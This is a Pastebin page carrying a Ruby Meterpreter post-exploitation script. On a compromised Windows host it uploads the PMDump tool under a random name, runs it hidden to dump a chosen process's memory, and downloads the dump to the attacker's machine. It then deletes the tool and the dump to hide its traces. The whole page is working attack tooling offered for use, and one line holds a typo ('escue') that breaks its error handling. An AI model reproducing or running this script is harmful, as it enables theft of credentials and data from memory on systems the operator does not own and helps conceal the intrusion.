Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env ruby
- # Meterpreter script for dumping target memory for a particular process using Arne Vidstrom's PMDump tool - http://ntsecurity.nu/toolbox/pmdump/
- # This is a modified version of memdump.rb a script written by Carlos Perez (Dark Operator) - http://www.darkoperator.com/blog/2009/3/10/meterpreter-memory-dump-script.html
- # modified by: redmeat_uk@hotmail.com
- # date: 26/09/2009
- require 'readline'
- session = client
- # Script Options
- @@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-t" => [ true, "Change the timeout default 5min. Specify timeout in seconds"]
- )
- # Expand enviroment %TEMP% variable to get location for storing image
- tmp = session.fs.file.expand_path("%TEMP%")
- # Create random name for the memory image
- imgname = sprintf("%.5d",rand(100000))
- # Setting timeout for command variable
- timeoutsec = 300
- #---------------------------------------------------------------------------------------------------------
- #Dumping memory image
- def memdump(session,tmp,imgname,timeoutsec)
- tmpout = []
- pmexe = File.join(Msf::Config.install_root, "data", "pmdump.exe")
- pmscramble = sprintf("%.5d",rand(100000))
- print_status("Uploading pmdump for dumping memory of a process....")
- begin
- session.fs.file.upload_file("#{tmp}\\#{pmscramble}.exe","#{pmexe}")
- print_status("pmdump uploaded as #{tmp}\\#{pmscramble}.exe")
- escue::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
- session.response_timeout=timeoutsec
- print_status("Process list...")
- begin
- r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{pmscramble}.exe -list", nil, {'Hidden' => 'true','Channelized' => true})
- while(d = r.channel.read)
- print_status("#{d}")
- end
- r.channel.close
- r.close
- line = Readline::readline('Please enter PID: ')
- Readline::HISTORY.push(line)
- rescue::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
- print_status("Dumping memory for process id #{line}")
- begin
- n = session.sys.process.execute("cmd.exe /c #{tmp}\\#{pmscramble}.exe #{line} #{tmp}\\#{imgname}", nil, {'Hidden' => 'true','Channelized' => true})
- while(d = n.channel.read)
- tmpout << d
- end
- n.channel.close
- n.close
- print_status("Finished dumping process's memory")
- rescue::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
- print_status("Downloading memory dump for process id #{line} to /tmp/pmdump-#{imgname}")
- session.fs.file.download_file("/tmp/pmdump-#{imgname}", "#{tmp}\\#{imgname}")
- print_status("Deleting pmdump.exe from target...")
- session.sys.process.execute("cmd.exe /c del #{tmp}\\#{pmscramble}.exe", nil, {'Hidden' => 'true'})
- print_status("pmdump.exe deleted")
- print_status("Deleting left over files...")
- session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
- print_status("process memory dump image on target deleted")
- end
- ################## MAIN ##################
- # Parsing of Option
- hlp = 0
- chk = 0
- @@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-t"
- timeoutsec = val
- when "-h"
- hlp = 1
- print(
- "Process Memory Dumper Meterpreter Script\n" +
- @@exec_opts.usage
- )
- break
- end
- }
- if (hlp == 0)
- if (chk == 0)
- print_status("Running Meterpreter Process Memory Dump Script.....")
- memdump(session,tmp,imgname,timeoutsec)
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement